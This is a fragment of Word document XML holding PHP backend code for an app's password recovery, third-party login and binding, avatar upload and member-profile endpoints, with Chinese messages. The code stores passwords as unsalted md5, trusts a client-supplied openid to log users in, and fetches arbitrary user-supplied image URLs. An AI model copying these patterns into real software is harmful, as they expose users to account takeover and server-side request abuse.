      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6AC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106D2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D5E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472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 $email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564C7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code') ? input('code') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46455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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67689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2DEF4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验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4386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F78C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1E2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email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81C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2DF0F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邮箱验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AA9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29CA7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BD2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1C3A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B06FE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填写验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16693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E4433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7C80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6D9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0910F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1D7C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username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C10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415E99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521F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data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62112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6F5E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09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08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8762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where)-&gt;fetchSql(false)-&gt;field("id,hide")-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE2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5B67A4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2182D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不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649321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code' =&gt; 221,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86D3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691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DD8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6C8C0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536A99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无法使用密码找回，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B953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65A34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346DC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使用密码找回，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090D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20E80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44F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289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01B4C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1255F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无法使用密码找回，原因是账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1B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26280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7AC5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使用密码找回，原因是账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FB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622FD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590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A71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16BA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92E2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无法使用密码找回，原因是账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B8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20D18E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259D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使用密码找回，原因是账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34C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622077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9725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3B2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657FB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603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map['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D1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ail) $map['email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253EBC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gt;where($map)-&gt;setField('password', md5($password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5AD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A6E9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密码找回</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1F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密码修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027A8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7F4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6A8C6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密码修改失败，请检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A38A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503F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40CE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430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6F1B9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2617F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ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41625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29A2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C4DC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oauth()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFCB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353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 ? input('type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED7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id = input('openid') ? input('openid') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D5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 input('nickname') ? input('nickname') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FD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input('img') ? input('img') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A7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input('info') ? input('info') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794251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username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0038B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1A7FEF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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'in:wxapp,qqapp,wbapp|require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39228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id' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F4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require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33040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gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C98F1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gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264A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A80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81DC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2A1E3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enid' =&gt; $openid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B362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nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D99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gt; $img,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE342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gt; $info,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35796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B8A3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226A2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DBFA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1BDE0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30204C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255B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3F5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Db::name('member_band')-&gt;where(['type' =&gt; $type, 'code' =&gt; $openid])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DC8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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051D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id' =&gt; $uid, 'hide' =&gt; 1])-&gt;field('id,password')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD29D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E02B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B478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_isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E808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34B12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格式错误，请填写正确手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C0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95F2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4283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C07E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code/d') ? input('code/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C57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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A43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2F5F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输入手机验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C716E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696D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18B2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8C90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username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CF0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3B065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CB2F9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data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792387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63068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FEA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EC4B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DB::name('member')-&gt;where('mobile', $username)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424C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32090C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band_db = Db::name('member_band')-&gt;where(['uid' =&gt; $uid])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20332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band_db) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B17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6ED03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已被其他用户绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A82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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82E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9738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13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uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453232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ype'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8E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code'] = $openid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D3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ime'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53D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info'] = $info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A235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db = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE6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 $data['type'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FA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id' =&gt; $uid, 'hide' =&gt; 1])-&gt;field('id,password')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496008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26B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this-&gt;user(['openid' =&gt; $openid, 'type' =&gt; $type, 'nickname' =&gt; $nickname, 'img' =&gt; $img, 'info' =&gt; $info, 'username' =&gt; $username]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CC3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C64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EEC2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s = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3FB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s) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9E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info' =&gt; $info]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC88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A7A6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this-&gt;user(['openid' =&gt; $openid, 'type' =&gt; $type, 'nickname' =&gt; $nickname, 'img' =&gt; $img, 'info' =&gt; $info]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45326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A0A9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99A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3D8E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69A0C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56F30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44BF9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member['id'])-&gt;update(['update_time' =&gt; $time, 'update_ip' =&gt; $ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062062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member['id'], '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A0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 . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACEE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_encrypt($data)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41A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5FC2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50C9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登陆失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB6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FB437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AF8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6E5F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454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rivate function user($data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A73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D00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04FB1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F759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8B2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6DA10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md5(rand(100000, 999999));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55914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password'] = $password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C0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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B7FE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55B63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create_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49742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time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835BC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ip'] = $ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088CF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nickname'] = $data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B884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img'] = $this-&gt;uploadImg($data['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E00E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data['username'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C974E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mobile'] = $data['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6E2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3B5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gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFE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091D7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 '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614A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uid'] = $db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBD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ype'] = $data['type'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C6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code'] = $data['openid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F400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time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D9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info'] = $data['info'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3AF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mapdb = Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820AD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db, $data['type'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A83C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1E3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id' =&gt; $db, 'password' =&gt; $password];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0805B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C6F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 $type = '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BE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050C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rl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB366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09764D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941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3F61C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jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B5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4CC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1BCA8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432BF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092EE0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6672D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5EB347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1ED1B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6E74B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url . rand(11111, 999999)) . $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98EF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79182A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2F1139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42EA8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AE48F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key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7008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1408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36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uploadImg($img)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55128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5ED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qiniu($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA69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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA0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6AD0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C42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 = ROOT_PATH . 'public/uploads/touimg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BC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date('Ymd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E2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 = $d . '/' . $date . '/';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580E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_exists($d)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4167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kdir($d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04310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E05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file_get_contents($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254087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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A2C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7AA7F7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E0E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and = rand(10000, 999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667AA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s = md5($img) . $rand . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E8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 = $d . '/' . $geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117CD9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d, $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA0C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ublic/uploads/touimg/" . $date . "/" . $geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA80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37E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281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user/info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员主页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5EA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会员主页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF78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79534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BB02A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005CA6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id         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6AA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会员信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F32E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB643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g      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11546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name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D949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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD2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guanzhu </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E91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ensi   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户粉丝数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B8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ongtai </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户动态数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29279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angke  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户访客数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA78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huozan  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户获赞数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AF2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weizhi   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA33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ollow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经关注该会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A56F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A85F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6B679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596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 ? input('id/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A63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66D2B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3BD05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42059C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uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E8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36ACAE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B8D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6D3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4C4DBB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number|require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C5F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8A6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6DF69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id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DD93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834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A026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33B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22258A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5514E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3F0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F1F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_user($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F47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 = $db['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C249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name'] = $db['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9488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qianming'] = $db['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E7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d'] = $db['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA4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ongtai'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1E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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9EA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5B095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ensi'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B5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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561D7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592F4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uanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B2F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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C164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B4A6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angke'] = Db::name('member_fangke')-&gt;where(['f_uid' =&gt; $db['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710955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uozan'] = Db::name('article_ping_zan')-&gt;where(['uid' =&gt; $db['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E279B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uanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EA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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48D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25016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zhi'] = explode(',', $db['update_ip'])['0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588E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zhi'] = $data['weizhi'] ? $data['weizhi'] : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未知</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEEB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hibo_zuan_f'] = Db::name('member_zhibo_liwu_list')-&gt;where(['uid' =&gt; $db['id']])-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73048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hibo_zuan_f_'] = _num($data['zhibo_zuan_f']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F227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hibo_zuan_s'] = Db::name('member_zhibo_liwu_list')-&gt;where(['uid_zhu' =&gt; $db['id']])-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE6A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hibo_zuan_s_'] = _num($data['zhibo_zuan_s']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16283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ollow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB0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amp;&amp; $id != $this-&gt;memberId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312BE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ollow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B0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05DB92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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2F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CFD53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886D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5DBD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F1041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9FB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user/invitation_links </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
